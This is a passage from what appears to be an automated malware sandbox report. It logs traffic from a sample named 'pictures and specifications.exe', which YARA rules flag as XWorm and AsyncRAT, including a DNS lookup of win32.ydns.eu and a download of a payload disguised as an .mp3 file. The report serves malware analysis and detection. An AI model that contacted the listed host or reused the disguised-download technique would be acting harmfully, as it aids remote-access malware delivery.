Mar 5, 2025 10:52:08.639234066 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.639266968 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.675817013 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.675837994 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.675847054 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.675858021 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.675867081 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.675875902 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.675887108 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.675918102 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.676001072 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.688966990 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.688986063 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.688993931 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.689039946 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.689049959 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.689062119 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.689071894 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.689074039 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.689095020 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.689110994 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.689122915 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.689145088 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.689145088 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.728490114 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728512049 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728529930 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728539944 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728549004 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728562117 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728576899 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728585958 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728595972 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728596926 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.728598118 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.728604078 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728598118 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.728615999 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728676081 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.728676081 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.728676081 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.728686094 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728697062 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728718996 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728734970 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728744984 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728749990 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.728753090 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728765965 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728770971 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.728802919 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728810072 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.728812933 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728822947 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728837967 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.728863955 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.728899002 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728909969 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728943110 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728950024 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728960991 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.728966951 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728976965 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728981018 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.728987932 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.728997946 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729032040 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729053020 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729054928 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729067087 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729075909 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729084969 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729095936 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729104042 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729109049 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729110956 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729130983 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729151964 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729154110 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729170084 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729183912 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729191065 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729201078 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729203939 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729223013 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729229927 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729245901 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729253054 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729273081 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729283094 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729291916 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729315042 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729335070 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729345083 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729352951 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729378939 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729396105 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729404926 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729413033 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729444027 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729476929 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729513884 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729530096 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729541063 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729547977 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729556084 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729566097 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729572058 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729613066 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729613066 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729625940 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729650974 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729682922 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729691982 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729695082 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729732990 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729742050 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729753017 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729773998 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729784012 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729793072 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729794025 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729825020 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729851961 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729861975 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729871988 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729882002 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729897022 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729919910 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.729979038 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.729990959 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730031967 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.730062008 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730077028 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730086088 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730094910 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730104923 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730108023 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.730114937 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730127096 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.730150938 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.730207920 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730218887 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730227947 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730237007 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730246067 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730256081 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.730256081 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.730284929 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.730529070 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730576992 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730587006 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730607033 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730616093 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.730617046 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730628014 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730640888 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.730657101 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730667114 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.730668068 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730709076 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730715990 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.730719090 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730736971 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730767965 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.730854034 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730864048 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730873108 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730881929 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730895042 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730900049 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.730911970 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730922937 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730923891 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.730923891 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.730932951 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730961084 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.730962038 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.730999947 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.733746052 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.768507004 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.768517017 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.768526077 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.768531084 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.768603086 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.768637896 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:12.588768005 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:12.588861942 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:21.418514967 CET	49730	80	192.168.2.4	45.144.214.104

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 5, 2025 10:52:06.818938017 CET	55040	53	192.168.2.4	1.1.1.1
Mar 5, 2025 10:52:06.835181952 CET	53	55040	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 5, 2025 10:52:06.818938017 CET	192.168.2.4	1.1.1.1	0x381a	Standard query (0)	win32.ydns.eu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 5, 2025 10:52:06.835181952 CET	1.1.1.1	192.168.2.4	0x381a	No error (0)	win32.ydns.eu		45.144.214.104	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

win32.ydns.eu

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	45.144.214.104	80	7300	C:\Users\user\Desktop\pictures and specifications.exe

Timestamp	Bytes transferred	Direction	Data
Mar 5, 2025 10:52:06.844861031 CET	110	OUT	GET /never/lookinto/it/panel/uploads/Qwprueqkjqe.mp3 HTTP/1.1 Host: win32.ydns.eu Connection: Keep-Alive
Mar 5, 2025 10:52:07.576247931 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 05 Mar 2025 09:52:07 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Wed, 05 Mar 2025 04:55:18 GMT ETag: "fa608-62f91322bd5cc" Accept-Ranges: bytes Content-Length: 1025544 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: audio/mpeg Data Raw: 3e 01 68 ff be 5c 3e 2e aa 11 0e 2e 6a 9d 70 68 69 8e c8 f5 46 49 c7 57 ac 9d 9c bf ef a8 96 f3 f5 c7 7e c0 d8 58 d6 d1 e7 50 ee cc 4d 35 52 12 88 01 7c f3 cb 6f b5 ad 03 2f de bb 78 7b 08 e3 0d 5a 4b 55 36 f8 9d 30 ce 3a a6 f2 bc fc d6 83 19 1d e3 77 de d1 ad a0 92 a9 ba a9 f1 93 aa 04 d0 27 89 38 f5 4c 3a 92 f1 82 a3 99 d9 61 2e b2 b8 e4 23 23 e2 c6 00 42 70 a3 50 2c dd 9e 4c 51 d3 3a ec d7 f4 7f 6d 3e a1 09 66 22 6d 6a d9 41 33 fc 09 e5 eb 22 81 a9 17 a6 2d 70 1b 63 a0 10 f6 eb 58 e7 4e 84 d4 ce 34 3e 60 17 0e dc 58 17 35 f2 aa 7f 94 c8 0c 61 10 a6 54 89 cd e6 a9 97 4c e7 49 36 a4 d9 42 03 8d 9d 95 d9 10 95 ef 91 b4 b6 b3 71 03 68 f8 bd 0a 8d 84 20 23 b7 c5 0b ed e9 d8 bf 1e 6c b2 e5 fa 6b cf 87 7d 7f c2 77 3f 9d a3 24 2f bb 3b 9d bc 81 1f 54 65 8b aa 4e d9 d8 92 c9 dc d3 c2 81 34 3e 6b 3d 16 42 61 61 86 61 d5 93 c6 c2 5c b4 cc 1c 53 94 cf 0f 6d c6 51 28 35 37 0b 65 c6 7b b9 22 54 7c 0a 15 64 2c 64 2d 3f c8 36 22 39 f0 85 85 1b c3 6a 06 8d 6f bf 4a 59 ba 4d e3 6b 53 9a 02 86 3b 61 34 06 3e 2a 83 [TRUNCATED] Data Ascii: >h\>..jphiFIW~XPM5R\|o/x{ZKU60:w'8L:a.##BpP,LQ:m>f"mjA3"-pcXN4>`X5aTLI6Bqh #lk}w?$/;TeN4>k=Baaa\SmQ(57e{"T\|d,d-?6"9joJYMkS;a4>?V~u5b\|/k)PVH;lFR=A"#L$}bOH!UDWe<C_UY}U5h~ `cS)wlX_I3YB4Qh1N~BsS:pYR$AYsi}qMcbkRyU`0,n]CDSf/kTUp(h "kM':y`559y+63CB"\|>'8$Gqd$b\G4m{iYTHVQ~ay!+1Df[>5ZK9Pj%q1sz"7#^7r,+#i ]j`BUqsIAYd_?=FA!A'e>}s%u,Z;!B!ZHBGu}~)f@!kakkaL1\M6[Qr)V
Mar 5, 2025 10:52:07.576340914 CET	1236	IN	Data Raw: 52 24 08 5a 34 42 d2 67 f7 3b 12 55 64 a8 d7 fc 75 c5 50 fa e7 00 d7 20 e0 29 c5 df 90 29 70 9e f4 8a 1b 11 be d8 20 cb 42 8f 1f ea 7b 99 87 f5 89 61 d5 98 52 9a 31 28 e4 4f ee fc 9f ae 12 b7 de e5 34 89 8b 55 0f 18 2d 92 cd 84 a2 9f eb 27 d5 ac Data Ascii: R$Z4Bg;UduP ))p B{aR1(O4U-'Lu*%CsB"H}_2\|W$`T%r3Cn/P&R-~zBEeI/WzyC@sSu_'NgM*}R
Mar 5, 2025 10:52:07.576402903 CET	448	IN	Data Raw: 67 ef 75 f6 ef 25 72 fe 10 84 2c 14 2a 6e ea ef 40 ff 00 cc 14 42 7e 50 9e e7 2a 7d a0 9d 77 3c fa c5 c4 2a 10 e7 b8 24 51 c3 6d f1 ba b9 ce 03 66 6c 76 00 7f 90 64 8b ea f7 59 d7 bc 33 0e d6 61 be 02 76 9c 3e 92 35 68 d1 f2 04 b6 6e 2e ef d6 5d Data Ascii: gu%r,n@B~P}w<$QmflvdY3av>5hn.]+,NOnr\fU9/0f\|SQm9rQ2".vbXw<L4CNywsIS\|JM\@QW\|rE\|-Wy/"j$GIt#tEGm0;?U7
Mar 5, 2025 10:52:07.576469898 CET	1236	IN	Data Raw: ab 1a 8b 36 79 0f 43 30 36 95 9b d6 d9 78 37 1c d0 c4 77 9c 62 76 55 17 d8 70 4c d1 46 c7 e1 46 c9 43 c1 5a 4e 93 7b 5f 2d 49 09 dc 9c f5 09 cb f0 49 da bf 39 17 7b 7f 87 d7 d9 27 60 ef f0 93 59 c1 26 de a1 07 2f 34 99 7b 47 78 07 fc 3b bd 6a 19 Data Ascii: 6yC06x7wbvUpLFFCZN{_-II9{'`Y&/4{Gx;juF$' NY`^BZbz9[-m&*]974>{v)_E'Yq{FQJ^YL}[Nzzf"^];A~$-`m
Mar 5, 2025 10:52:07.576504946 CET	1236	IN	Data Raw: 5a b1 4a 76 93 40 ed f7 30 70 ec a1 d3 75 49 6c 1f f3 62 79 b7 e0 6d 76 fc d2 06 c8 91 ad 39 38 10 40 1c f2 50 48 7c c6 ad b9 f2 59 de 8b a2 4b ef bc 86 b2 8e e6 16 90 2c 4b fd 09 ee d4 31 a2 a2 a8 66 c8 a3 72 c4 94 bf 19 e8 da d6 fe d2 12 68 09 Data Ascii: ZJv@0puIlbymv98@PH\|YK,K1frhd7oF#fLP]g6Bsus0x%@ kkJ}\D7rc:#%?qsC,If4UQ.jTU9<-[0b8}+m5
Mar 5, 2025 10:52:07.576538086 CET	1236	IN	Data Raw: 39 55 dd b5 85 03 de 66 de 91 b6 48 e8 a0 6a b8 1d d0 6f 59 7d 4c 04 aa 91 3a ca af 42 c4 ce 16 93 40 3e 29 01 74 59 35 f2 80 5c fa c8 2f 16 25 38 cb 5b e8 3f b6 97 cc 44 e5 a1 c1 79 17 4e bb ed 0e 98 9f 64 6b 54 a5 dc 0d aa 97 1b 1e 73 59 32 4a Data Ascii: 9UfHjoY}L:B@>)tY5\/%8[?DyNdkTsY2Jt@*~5`sDr^@(SrUK"})9}#E8&vt~X;h@v8mVR#\!~nQvR;k>#v+<w
Mar 5, 2025 10:52:07.576572895 CET	1236	IN	Data Raw: e5 bd 5d 67 e6 9d fd 89 85 e9 ea 04 d2 d4 bf 67 52 dd 6c 67 b3 12 61 e3 21 27 e0 cf 92 85 7a 07 a9 f3 34 60 73 97 bd b6 c7 ee b9 eb 26 10 0c 26 da 36 35 df 82 90 f4 10 5a a9 a5 6a e5 9d e8 ec eb 78 88 24 67 47 8c 08 16 cd 48 a6 3d a3 85 4d f5 90 Data Ascii: ]ggRlga!'z4`s&&65Zjx$gGH=M$<jv<"..Ol&~Ao=)fV\ LLY_q@;;RqiO=7IVG@bR!Q[m-jmNo}&
Mar 5, 2025 10:52:07.576616049 CET	1236	IN	Data Raw: 64 65 1c dc 8e 4c c8 50 be 28 43 b5 c4 f6 4c 9f 5b 51 89 4e e5 d4 ac e5 df 52 79 84 22 0f a4 44 b9 26 63 bb c4 36 22 ea 97 e2 50 a7 4a 2d 34 56 98 99 ae f1 e6 6e 4e 15 9d ff 15 19 76 5a 5f f1 6e 98 d4 1c 40 d8 8d c9 77 ba 8f 66 4b 43 4b af 5e fc Data Ascii: deLP(CL[QNRy"D&c6"PJ-4VnNvZ_n@wfKCK^ <.oZI'%ByE$Ho@FXtQ4~+Pi/mh?jtmK`E`4lhzl\W=VBD>i$BN84gNY4
Mar 5, 2025 10:52:07.576694012 CET	1236	IN	Data Raw: 0d 46 e7 48 ff b4 ee 11 dc 32 f0 37 a1 25 76 a1 a1 7c d8 ca 2d 56 bf 34 35 29 87 2f bd 05 1a d5 dd f4 88 a6 e1 20 8f 90 e0 23 d4 c5 a5 6f 1f 61 ae 5b 93 6e a8 37 0d 72 21 2f bc b5 71 09 ad 1b 4b bc c4 7b 9a f4 0f 6b 21 31 42 16 70 93 da 78 36 f3 Data Ascii: FH27%v\|-V45)/ #oa[n7r!/qK{k!1Bpx6#:xS7lxWrW&"OnT]GgEF4?\^@2t<]4jtGrCtIVeUa}si;cHbd1VS)^%`Z
Mar 5, 2025 10:52:07.576729059 CET	1236	IN	Data Raw: e2 30 1e 35 f5 2b bf 8c 1e 3f 4c 70 34 43 91 f0 5a 09 0c 63 93 61 e5 73 ae 65 76 2d 5f 0d 7b 27 2c c2 8c 40 19 dd 40 7b 47 e1 64 ad be d7 e0 7f c2 d4 5d 1e 89 13 1d d5 6c 57 1b e4 c6 a1 b0 22 d5 28 b9 df 29 e1 d0 27 d3 6c 08 8e 34 ad d7 d4 50 e4 Data Ascii: 05+?Lp4CZcasev-_{',@@{Gd]lW"()'l4P{bOdL^yS5H3,\M}{w0A1b/WnU^3Sji-F$2?Az"PnNstqibkTqKv
Mar 5, 2025 10:52:07.581933975 CET	1236	IN	Data Raw: 52 3f d3 ff 3c 61 8b b6 a4 21 9f 1d 41 60 d8 4c cb a4 88 56 ce 3c 4f 40 1d fa a8 b0 ff 6d cd aa dd aa a0 09 80 24 19 c2 ec f4 23 32 c5 8e e7 d4 e0 64 df 7f 87 9e 37 0b 07 bd b7 d1 d5 fd d7 7e 49 a2 e7 cd e8 63 07 8d 6e 4f 9f b7 1d 71 da 9c ca 08 Data Ascii: R?<a!A`LV<O@m$#2d7~IcnOq~rV>G.G@?I.VJ(td}xW3$3n/c/B$<fRv)cYgo@4y?FECgtdHeR;-NzXE8

Target ID:	0
Start time:	04:52:06
Start date:	05/03/2025
Path:	C:\Users\user\Desktop\pictures and specifications.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\pictures and specifications.exe"
Imagebase:	0x470000
File size:	181'248 bytes
MD5 hash:	CE901F91244366477CD0B769D92F9034
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1811009270.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1798222881.0000000002AA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1798222881.0000000002AA4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1798222881.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:52:19
Start date:	05/03/2025
Path:	C:\Users\user\Desktop\pictures and specifications.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\pictures and specifications.exe"
Imagebase:	0xc30000
File size:	181'248 bytes
MD5 hash:	CE901F91244366477CD0B769D92F9034
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.2928492353.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.2928492353.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	04:52:22
Start date:	05/03/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 928
Imagebase:	0xa80000
